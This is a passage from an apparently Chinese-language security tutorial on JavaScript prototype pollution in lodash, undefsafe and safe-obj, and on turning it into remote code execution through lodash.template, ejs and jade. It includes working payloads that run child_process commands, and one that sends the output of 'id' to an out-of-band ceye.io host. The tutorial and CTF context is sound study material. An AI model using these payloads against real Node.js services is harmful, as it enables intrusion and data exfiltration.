function_">set</span>(object_2, <span class="hljs-string">&#x27;__proto__.[&quot;whoami&quot;]&#x27;</span>, <span class="hljs-string">&#x27;Vulnerable&#x27;</span>);<br><span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(object_1.<span class="hljs-property">whoami</span>);<br><span class="hljs-comment">//打印</span><br><span class="hljs-comment">//undefined</span><br><span class="hljs-comment">//Vulnerable</span><br></code></pre></td></tr></table></figure>

<h3 id="lodash-setWith"><a href="#lodash-setWith" class="headerlink" title="lodash.setWith"></a>lodash.setWith</h3><p>与mergeWith类似，相比于set方法多一个customizer参数控制设置对象值的方式，不传入也不影响我们的利用。</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">var</span> lodash= <span class="hljs-built_in">require</span>(<span class="hljs-string">&#x27;lodash&#x27;</span>);<br><br><span class="hljs-keyword">var</span> object_1 = &#123; <span class="hljs-string">&#x27;a&#x27;</span>: [&#123; <span class="hljs-string">&#x27;b&#x27;</span>: &#123; <span class="hljs-string">&#x27;c&#x27;</span>: <span class="hljs-number">3</span> &#125; &#125;] &#125;;<br><span class="hljs-keyword">var</span> object_2 = &#123;&#125;<br><br><span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(object_1.<span class="hljs-property">whoami</span>);<br><span class="hljs-comment">//lodash.setWith(object_2, &#x27;object_2[&quot;__proto__&quot;][&quot;whoami&quot;]&#x27;, &#x27;Vulnerable&#x27;);</span><br>lodash.<span class="hljs-title function_">setWith</span>(object_2, <span class="hljs-string">&#x27;__proto__.[&quot;whoami&quot;]&#x27;</span>, <span class="hljs-string">&#x27;Vulnerable&#x27;</span>);<br><span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(object_1.<span class="hljs-property">whoami</span>);<br></code></pre></td></tr></table></figure>

<h3 id="lodash-zipObjectDeep"><a href="#lodash-zipObjectDeep" class="headerlink" title="lodash.zipObjectDeep"></a>lodash.zipObjectDeep</h3><p>漏洞编号CVE-2020-8203，影响版本ver&lt;4.17.16</p>
<p>zipObjectDeep(props, values) ，props为属性路径，values是值，两者都为数组。</p>
<p>源码里给出了注释</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs js">_.<span class="hljs-title function_">zipObjectDeep</span>([<span class="hljs-string">&#x27;a.b[0].c&#x27;</span>, <span class="hljs-string">&#x27;a.b[1].d&#x27;</span>], [<span class="hljs-number">1</span>, <span class="hljs-number">2</span>]);  <br><span class="hljs-comment">// =&gt; &#123; &#x27;a&#x27;: &#123; &#x27;b&#x27;: [&#123; &#x27;c&#x27;: 1 &#125;, &#123; &#x27;d&#x27;: 2 &#125;] &#125; &#125;</span><br></code></pre></td></tr></table></figure>

<p>将两个对象合并成了一个数组，并完成赋值，左边数组的键值与右边数组的值一一对应。</p>
<p>那么如果我们传入单元素数组<code>__proto__</code>，就可以污染原型。</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">const</span> _ = <span class="hljs-built_in">require</span>(<span class="hljs-string">&#x27;lodash&#x27;</span>);<br><br>_.<span class="hljs-title function_">zipObjectDeep</span>([<span class="hljs-string">&#x27;__proto__.z&#x27;</span>],[<span class="hljs-number">666</span>])<br><br><span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(z)<br><span class="hljs-comment">//打印</span><br><span class="hljs-comment">//666</span><br></code></pre></td></tr></table></figure>

<h2 id="0x04-Lodash-RCE"><a href="#0x04-Lodash-RCE" class="headerlink" title="0x04 Lodash RCE"></a>0x04 Lodash RCE</h2><p>注意lodash ver&lt;&#x3D;4.17.4。</p>
<h3 id="lodash-template-RCE"><a href="#lodash-template-RCE" class="headerlink" title="lodash.template   RCE"></a>lodash.template   RCE</h3><p>Lodash.template 是 Lodash 中的一个简单的模板引擎用于输出渲染，而template方法中的<code>sourceURL</code>存在拼接，关键代码如下</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">var</span> result = <span class="hljs-title function_">attempt</span>(<span class="hljs-keyword">function</span>(<span class="hljs-params"></span>) &#123;<br>  <span class="hljs-keyword">return</span> <span class="hljs-title class_">Function</span>(importsKeys, sourceURL + <span class="hljs-string">&#x27;return &#x27;</span> + source)<br>    .<span class="hljs-title function_">apply</span>(<span class="hljs-literal">undefined</span>, importsValues);<br>&#125;);<br></code></pre></td></tr></table></figure>

<p>如果我们能够污染<code>sourceURL</code>属性，将其赋值为<code>xxx\r\n &lt;code&gt; \r\n</code>就可实现命令注入，因此关键点在于原型链的污染。</p>
<p>注意Function中没有require方法，但我们可以使用<code>global.process.mainModule.constructor._load</code>来代替。</p>
<p>这里提供一道例题**[Code-Breaking 2018] Thejs**，源码如下</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">const</span> fs = <span class="hljs-built_in">require</span>(<span class="hljs-string">&#x27;fs&#x27;</span>)<br><span class="hljs-keyword">const</span> express = <span class="hljs-built_in">require</span>(<span class="hljs-string">&#x27;express&#x27;</span>)<br><span class="hljs-keyword">const</span> bodyParser = <span class="hljs-built_in">require</span>(<span class="hljs-string">&#x27;body-parser&#x27;</span>)<br><span class="hljs-keyword">const</span> lodash = <span class="hljs-built_in">require</span>(<span class="hljs-string">&#x27;lodash&#x27;</span>)<br><span class="hljs-keyword">const</span> session = <span class="hljs-built_in">require</span>(<span class="hljs-string">&#x27;express-session&#x27;</span>)<br><span class="hljs-keyword">const</span> randomize = <span class="hljs-built_in">require</span>(<span class="hljs-string">&#x27;randomatic&#x27;</span>)<br><br><span class="hljs-keyword">const</span> app = <span class="hljs-title function_">express</span>()<br>app.<span class="hljs-title function_">use</span>(bodyParser.<span class="hljs-title function_">urlencoded</span>(&#123;<span class="hljs-attr">extended</span>: <span class="hljs-literal">true</span>&#125;)).<span class="hljs-title function_">use</span>(bodyParser.<span class="hljs-title function_">json</span>())<br>app.<span class="hljs-title function_">use</span>(<span class="hljs-string">&#x27;/static&#x27;</span>, express.<span class="hljs-title function_">static</span>(<span class="hljs-string">&#x27;static&#x27;</span>))<br>app.<span class="hljs-title function_">use</span>(<span class="hljs-title function_">session</span>(&#123;<br>    <span class="hljs-attr">name</span>: <span class="hljs-string">&#x27;thejs.session&#x27;</span>,<br>    <span class="hljs-attr">secret</span>: <span class="hljs-title function_">randomize</span>(<span class="hljs-string">&#x27;aA0&#x27;</span>, <span class="hljs-number">16</span>),<br>    <span class="hljs-attr">resave</span>: <span class="hljs-literal">false</span>,<br>    <span class="hljs-attr">saveUninitialized</span>: <span class="hljs-literal">false</span><br>&#125;))<br>app.<span class="hljs-title function_">engine</span>(<span class="hljs-string">&#x27;ejs&#x27;</span>, <span class="hljs-keyword">function</span> (<span class="hljs-params">filePath, options, callback</span>) &#123; <span class="hljs-comment">// define the template engine</span><br>    fs.<span class="hljs-title function_">readFile</span>(filePath, <span class="hljs-function">(<span class="hljs-params">err, content</span>) =&gt;</span> &#123;<br>        <span class="hljs-keyword">if</span> (err) <span class="hljs-keyword">return</span> <span class="hljs-title function_">callback</span>(<span class="hljs-keyword">new</span> <span class="hljs-title class_">Error</span>(err))<br>        <span class="hljs-keyword">let</span> compiled = lodash.<span class="hljs-title function_">template</span>(content)<br>        <span class="hljs-keyword">let</span> rendered = <span class="hljs-title function_">compiled</span>(&#123;...options&#125;)<br><br>        <span class="hljs-keyword">return</span> <span class="hljs-title function_">callback</span>(<span class="hljs-literal">null</span>, rendered)<br>    &#125;)<br>&#125;)<br>app.<span class="hljs-title function_">set</span>(<span class="hljs-string">&#x27;views&#x27;</span>, <span class="hljs-string">&#x27;./views&#x27;</span>)<br>app.<span class="hljs-title function_">set</span>(<span class="hljs-string">&#x27;view engine&#x27;</span>, <span class="hljs-string">&#x27;ejs&#x27;</span>)<br><br>app.<span class="hljs-title function_">all</span>(<span class="hljs-string">&#x27;/&#x27;</span>, <span class="hljs-function">(<span class="hljs-params">req, res</span>) =&gt;</span> &#123;<br>    <span class="hljs-keyword">let</span> data = req.<span class="hljs-property">session</span>.<span class="hljs-property">data</span> &#124;&#124; &#123;<span class="hljs-attr">language</span>: [], <span class="hljs-attr">category</span>: []&#125;<br>    <span class="hljs-keyword">if</span> (req.<span class="hljs-property">method</span> == <span class="hljs-string">&#x27;POST&#x27;</span>) &#123;<br>        data = lodash.<span class="hljs-title function_">merge</span>(data, req.<span class="hljs-property">body</span>)<br>        req.<span class="hljs-property">session</span>.<span class="hljs-property">data</span> = data<br>    &#125;<br><br>    res.<span class="hljs-title function_">render</span>(<span class="hljs-string">&#x27;index&#x27;</span>, &#123;<br>        <span class="hljs-attr">language</span>: data.<span class="hljs-property">language</span>,<br>        <span class="hljs-attr">category</span>: data.<span class="hljs-property">category</span><br>    &#125;)<br>&#125;)<br><br>app.<span class="hljs-title function_">listen</span>(<span class="hljs-number">3000</span>, <span class="hljs-function">() =&gt;</span> <span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-string">`Example app listening on port 3000!`</span>))<br></code></pre></td></tr></table></figure>

<p>可以看到同时使用了<code>Lodash.template</code>与<code>Lodash.merge</code>，merge方法在lodash漏洞版本内，因此我们就可以直接去污染</p>
<p><code>sourceURL</code>实现RCE，以下是payload。</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs json"><span class="hljs-comment">//执行并外带，设置type为json</span><br><span class="hljs-punctuation">&#123;</span><span class="hljs-attr">&quot;__proto__&quot;</span><span class="hljs-punctuation">:</span><span class="hljs-punctuation">&#123;</span><span class="hljs-attr">&quot;sourceURL&quot;</span><span class="hljs-punctuation">:</span><span class="hljs-string">&quot;xxx\r\nvar require = global.require &#124;&#124; global.process.mainModule.constructor._load;var result = require(&#x27;child_process&#x27;).execSync(&#x27;id&#x27;).toString();var req = require(&#x27;http&#x27;).request(`http://xxxxx.ceye.io/$&#123;result&#125;`);req.end();\r\n&quot;</span><span class="hljs-punctuation">&#125;</span><span class="hljs-punctuation">&#125;</span><br></code></pre></td></tr></table></figure>

<h3 id="lodash-amp-ejs-RCE"><a href="#lodash-amp-ejs-RCE" class="headerlink" title="lodash &amp; ejs RCE"></a>lodash &amp; ejs RCE</h3><p>漏洞编号CVE-2022-29078，Nodejs 的 ejs 模板引擎存在一个利用原型污染进行 RCE 的一个漏洞。但要实现 RCE，首先需要有原型链污染，这里我们暂且使用 lodash.merge 方法中的原型链污染漏洞。</p>
<p>漏洞成因其实和lodash.template是一样的，都是变量存在拼接，同时配合merge污染。漏洞关键代码如下</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-comment">//ejs.js compile方法</span><br><span class="hljs-comment">//	....</span><br>    <span class="hljs-keyword">if</span> (opts.<span class="hljs-property">outputFunctionName</span>) &#123;<br>        prepended += <span class="hljs-string">&#x27;  var &#x27;</span> + opts.<span class="hljs-property">outputFunctionName</span> + <span class="hljs-string">&#x27; = __append;&#x27;</span> + <span class="hljs-string">&#x27;\n&#x27;</span>;<br>      &#125;<br><span class="hljs-comment">//	....</span><br>      <span class="hljs-variable language_">this</span>.<span class="hljs-property">source</span> = prepended + <span class="hljs-variable language_">this</span>.<span class="hljs-property">source</span> + appended;<br><span class="hljs-comment">//	.... </span><br><span class="hljs-comment">//	source -&gt; src</span><br><span class="hljs-comment">//	....</span><br>	fn = <span class="hljs-keyword">new</span> <span class="hljs-title function_">ctor</span>(opts.<span class="hljs-property">localsName</span> + <span class="hljs-string">&#x27;, escapeFn, include, rethrow&#x27;</span>, src); <span class="hljs-comment">//此处执行</span><br><br></code></pre></td></tr></table></figure>

<p>很明显污染<code>outputFunctionName</code>即可。</p>
<p>测试代码如下</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">var</span> express = <span class="hljs-built_in">require</span>(<span class="hljs-string">&#x27;express&#x27;</span>);<br><span class="hljs-keyword">var</span> lodash = <span class="hljs-built_in">require</span>(<span class="hljs-string">&#x27;lodash&#x27;</span>);<br><span class="hljs-keyword">var</span> ejs = <span class="hljs-built_in">require</span>(<span class="hljs-string">&#x27;ejs&#x27;</span>);<br><br><span class="hljs-keyword">var</span> app = <span class="hljs-title function_">express</span>();<br><span class="hljs-comment">//设置模板的位置与种类</span><br>app.<span class="hljs-title function_">set</span>(<span class="hljs-string">&#x27;views&#x27;</span>, __dirname);<br>app.<span class="hljs-title function_">set</span>(<span class="hljs-string">&#x27;views engine&#x27;</span>,<span class="hljs-string">&#x27;ejs&#x27;</span>);<br><br><span class="hljs-comment">//对原型进行污染</span><br><span class="hljs-keyword">var</span> malicious_payload = <span class="hljs-string">&#x27;&#123;&quot;__proto__&quot;:&#123;&quot;outputFunctionName&quot;:&quot;_tmp1;global.process.mainModule.require(\&#x27;child_process\&#x27;).exec(\&#x27;calc\&#x27;);var __tmp2&quot;&#125;&#125;&#x27;</span>;<br>lodash.<span class="hljs-title function_">merge</span>(&#123;&#125;, <span class="hljs-title class_">JSON</span>.<span class="hljs-title function_">parse</span>(malicious_payload));<br><br><span class="hljs-comment">//进行渲染</span><br>app.<span class="hljs-title function_">get</span>(<span class="hljs-string">&#x27;/&#x27;</span>, <span class="hljs-keyword">function</span> (<span class="hljs-params">req, res</span>) &#123;<br>    res.<span class="hljs-property">render</span> (<span class="hljs-string">&quot;index.ejs&quot;</span>,&#123;<br>        <span class="hljs-attr">message</span>: <span class="hljs-string">&#x27;success&#x27;</span><br>    &#125;);<br>&#125;);<br><br><span class="hljs-comment">//设置http</span><br><span class="hljs-keyword">var</span> server = app.<span class="hljs-title function_">listen</span>(<span class="hljs-number">8000</span>, <span class="hljs-keyword">function</span> (<span class="hljs-params"></span>) &#123;<br><br>    <span class="hljs-keyword">var</span> host = server.<span class="hljs-title function_">address</span>().<span class="hljs-property">address</span><br>    <span class="hljs-keyword">var</span> port = server.<span class="hljs-title function_">address</span>().<span class="hljs-property">port</span><br><br>    <span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-string">&quot;应用实例，访问地址为 http://%s:%s&quot;</span>, host, port)<br>&#125;);<br></code></pre></td></tr></table></figure>

<p>运行后访问触发render函数渲染，即可RCE。</p>
<h3 id="lodash-amp-jade-RCE"><a href="#lodash-amp-jade-RCE" class="headerlink" title="lodash &amp; jade RCE"></a>lodash &amp; jade RCE</h3><p>Nodejs 的 jade 模板引擎也存在一个利用原型污染进行 RCE 的一个漏洞。但要实现 RCE，首先需要有原型链污染，这里我们依然使用 lodash.merge 方法中的原型链污染漏洞。</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">var</span> express = <span class="hljs-built_in">require</span>(<span class="hljs-string">&#x27;express&#x27;</span>);<br><span class="hljs-keyword">var</span> lodash= <span class="hljs-built_in">require</span>(<span class="hljs-string">&#x27;lodash&#x27;</span>);<br><span class="hljs-keyword">var</span> jade = <span class="hljs-built_in">require</span>(<span class="hljs-string">&#x27;jade&#x27;</span>);<br><br><span class="hljs-keyword">var</span> app = <span class="hljs-title function_">express</span>();<br><span class="hljs-comment">//设置模板的位置与种类</span><br>app.<span class="hljs-title function_">set</span>(<span class="hljs-string">&#x27;views&#x27;</span>, __dirname);<br>app.<span class="hljs-title function_">set</span>(<span class="hljs-string">&quot;view engine&quot;</span>, <span class="hljs-string">&quot;jade&quot;</span>);<br><br><span class="hljs-comment">//对原型进行污染</span><br><span class="hljs-keyword">var</span> malicious_payload = <span class="hljs-string">&#x27;&#123;&quot;__proto__&quot;:&#123;&quot;compileDebug&quot;:1,&quot;self&quot;:1,&quot;line&quot;:&quot;console.log(global.process.mainModule.require(\&#x27;child_process\&#x27;).execSync(\&#x27;calc\&#x27;))&quot;&#125;&#125;&#x27;</span>;<br>lodash.<span class="hljs-title function_">merge</span>(&#123;&#125;, <span class="hljs-title class_">JSON</span>.<span class="hljs-title function_">parse</span>(malicious_payload));<br><br><span class="hljs-comment">//进行渲染</span><br>app.<span class="hljs-title function_">get</span>(<span class="hljs-string">&#x27;/&#x27;</span>, <span class="hljs-keyword">function</span> (<span class="hljs-params">req, res</span>) &#123;<br>    res.<span class="hljs-property">render</span> (<span class="hljs-string">&quot;index.jade&quot;</span>,&#123;<br>        <span class="hljs-attr">message</span>: <span class="hljs-string">&#x27;success&#x27;</span><br>    &#125;);<br>&#125;);<br><br><span class="hljs-comment">//设置http</span><br><span class="hljs-keyword">var</span> server = app.<span class="hljs-title function_">listen</span>(<span class="hljs-number">8000</span>, <span class="hljs-keyword">function</span> (<span class="hljs-params"></span>) &#123;<br><br>    <span class="hljs-keyword">var</span> host = server.<span class="hljs-title function_">address</span>().<span class="hljs-property">address</span><br>    <span class="hljs-keyword">var</span> port = server.<span class="hljs-title function_">address</span>().<span class="hljs-property">port</span><br><br>    <span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-string">&quot;应用实例，访问地址为 http://%s:%s&quot;</span>, host, port)<br>&#125;);<br></code></pre></td></tr></table></figure>

<h2 id="0x05-Undefsafe-中的污染"><a href="#0x05-Undefsafe-中的污染" class="headerlink" title="0x05 Undefsafe 中的污染"></a>0x05 Undefsafe 中的污染</h2><p>Undefsafe模块是用来处理访问对象属性不存在时的报错问题，例如</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">var</span> a = <span class="hljs-built_in">require</span>(<span class="hljs-string">&quot;undefsafe&quot;</span>);<br><span class="hljs-keyword">var</span> object = &#123;<br>    <span class="hljs-attr">a</span>: &#123;<br>        <span class="hljs-attr">b</span>: &#123;<br>            <span class="hljs-attr">c</span>: <span class="hljs-number">1</span>,<br>            <span class="hljs-attr">d</span>: [<span class="hljs-number">1</span>,<span class="hljs-number">2</span>,<span class="hljs-number">3</span>],<br>            <span class="hljs-attr">e</span>: <span class="hljs-string">&#x27;old_value&#x27;</span><br>        &#125;<br>    &#125;<br>&#125;;<br><span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(object.<span class="hljs-property">a</span>.<span class="hljs-property">c</span>.<span class="hljs-property">e</span>)  <span class="hljs-comment">//打印不存在的属性</span><br><span class="hljs-comment">//程序报错</span><br><br><span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-title function_">a</span>(object,<span class="hljs-string">&#x27;a.c.e&#x27;</span>)) <br><span class="hljs-comment">//undefined	</span><br><br><span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-title function_">a</span>(object,<span class="hljs-string">&#x27;a.b.e&#x27;</span>,<span class="hljs-string">&#x27;new_value&#x27;</span>)) <br><span class="hljs-comment">//new_value</span><br></code></pre></td></tr></table></figure>

<p>当我们使用undefsafe时，程序就不会报错而是返回<code>undefined</code>，如果目标属性存在，那么undefsafe就可以修改属性的值。如果该属性不存在，我们依然想赋值，那么新的属性将创建在数组中的上一层。</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-title function_">a</span>(object,<span class="hljs-string">&#x27;a.c.e&#x27;</span>,<span class="hljs-string">&#x27;new_value&#x27;</span>)<br><span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(object)<br><span class="hljs-comment">//&#123; a: &#123; b: &#123; c: 1, d: [Array], e: &#x27;old_value&#x27; &#125;, e: &#x27;new_value&#x27; &#125; &#125;</span><br></code></pre></td></tr></table></figure>

<p>漏洞编号CVE-2019-10795，ver &lt; 2.0.3，poc如下</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">var</span> a = <span class="hljs-built_in">require</span>(<span class="hljs-string">&quot;undefsafe&quot;</span>);<br><span class="hljs-keyword">var</span> test = &#123;&#125;<br><span class="hljs-title function_">a</span>(test,<span class="hljs-string">&#x27;__proto__.toString&#x27;</span>,<span class="hljs-keyword">function</span>(<span class="hljs-params"></span>)&#123; <span class="hljs-keyword">return</span> <span class="hljs-string">&#x27;just a evil!&#x27;</span>&#125;)<br><span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-string">&#x27;this is &#x27;</span>+test)   <br><span class="hljs-comment">// this is just a evil!</span><br></code></pre></td></tr></table></figure>

<p>利用undefsafe对原型对象中的toString方法进行污染，再通过console.log触发，造成任意代码执行。</p>
<p>可见原型链污染不仅可以修改属性，也可以直接修改方法</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">var</span> a = <span class="hljs-built_in">require</span>(<span class="hljs-string">&quot;undefsafe&quot;</span>);<br><span class="hljs-keyword">var</span> test = &#123;&#125;<br><span class="hljs-title function_">a</span>(test,<span class="hljs-string">&#x27;__proto__.toString&#x27;</span>,<span class="hljs-keyword">function</span>(<span class="hljs-params"></span>)&#123; <span class="hljs-keyword">return</span> <span class="hljs-variable language_">global</span>.<span class="hljs-property">process</span>.<span class="hljs-property">mainModule</span>.<span class="hljs-built_in">require</span>(<span class="hljs-string">&#x27;child_process&#x27;</span>).<span class="hljs-title function_">execSync</span>(<span class="hljs-string">&#x27;id&#x27;</span>).<span class="hljs-title function_">toString</span>()&#125;)<br><span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-string">&#x27;this is &#x27;</span>+test)<br><span class="hljs-comment">// this is uid=0(root) gid=0(root) groups=0(root)</span><br></code></pre></td></tr></table></figure>



<h2 id="0x06-safe-obj中的污染"><a href="#0x06-safe-obj中的污染" class="headerlink" title="0x06 safe-obj中的污染"></a>0x06 safe-obj中的污染</h2><h3 id="lodash-amp-safe-obj"><a href="#lodash-amp-safe-obj" class="headerlink" title="lodash &amp; safe-obj"></a>lodash &amp; safe-obj</h3><p>漏洞编号CVE-2021-25928，safe-obj_ver_1.0.0~1.0.2，关键点在expand方法</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-attr">expand</span>: <span class="hljs-keyword">function</span> (<span class="hljs-params">obj, path, thing</span>) &#123;<br>  <span class="hljs-keyword">if</span> (!path &#124;&#124; <span class="hljs-keyword">typeof</span> thing === <span class="hljs-string">&#x27;undefined&#x27;</span>) &#123;<br>    <span class="hljs-keyword">return</span>;<br>  &#125;<br>  obj = <span class="hljs-title function_">isObject</span>(obj) &amp;&amp; obj !== <span class="hljs-literal">null</span> ? obj : &#123;&#125;;<br>  <span class="hljs-keyword">var</span> props = path.<span class="hljs-title function_">split</span>(<span class="hljs-string">&#x27;.&#x27;</span>); <span class="hljs-comment">//先用 . 分割</span><br>  <span class="hljs-keyword">if</span> (props.<span class="hljs-property">length</span> === <span class="hljs-number">1</span>) &#123;  <br>    obj[props.<span class="hljs-title function_">shift</span>()] = thing; <br>  &#125; <span class="hljs-keyword">else</span> &#123;<br>    <span class="hljs-keyword">var</span> prop = props.<span class="hljs-title function_">shift</span>(); <span class="hljs-comment">//shift()返回数组第一个元素</span><br>    <span class="hljs-keyword">if</span> (!(prop <span class="hljs-keyword">in</span> obj)) &#123;<br>      obj[prop] = &#123;&#125;;<br>    &#125;<br>    _safe.<span class="hljs-title function_">expand</span>(obj[prop], props.<span class="hljs-title function_">join</span>(<span class="hljs-string">&#x27;.&#x27;</span>), thing);<span class="hljs-comment">//递归调用expand，下一次满足props.length === 1</span><br>  &#125;<br>&#125;,<br></code></pre></td></tr></table></figure>

<p>poc如下</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">var</span> safeObj = <span class="hljs-built_in">require</span>(<span class="hljs-string">&quot;safe-obj&quot;</span>);<br><span class="hljs-keyword">var</span> obj = &#123;&#125;;<br><span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-string">&quot;Before : &quot;</span> + &#123;&#125;.<span class="hljs-property">polluted</span>);<br>safeObj.<span class="hljs-title function_">expand</span>(obj, <span class="hljs-string">&#x27;__proto__.polluted&#x27;</span>, <span class="hljs-string">&#x27;Yes! Its Polluted&#x27;</span>);<br><span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-string">&quot;After : &quot;</span> + &#123;&#125;.<span class="hljs-property">polluted</span>);<br><span class="hljs-comment">//Before : undefined</span><br><span class="hljs-comment">//After : Yes! Its Polluted</span><br></code></pre></td></tr></table></figure>

<h3 id="lodash-amp-safe-flat"><a href="#lodash-amp-safe-flat" class="headerlink" title="lodash &amp; safe-flat"></a>lodash &amp; safe-flat</h3><p>漏洞编号CVE-2021-25927，safe-flat_ver_2.0.0~2.0.1，关键在于unflatten</p>
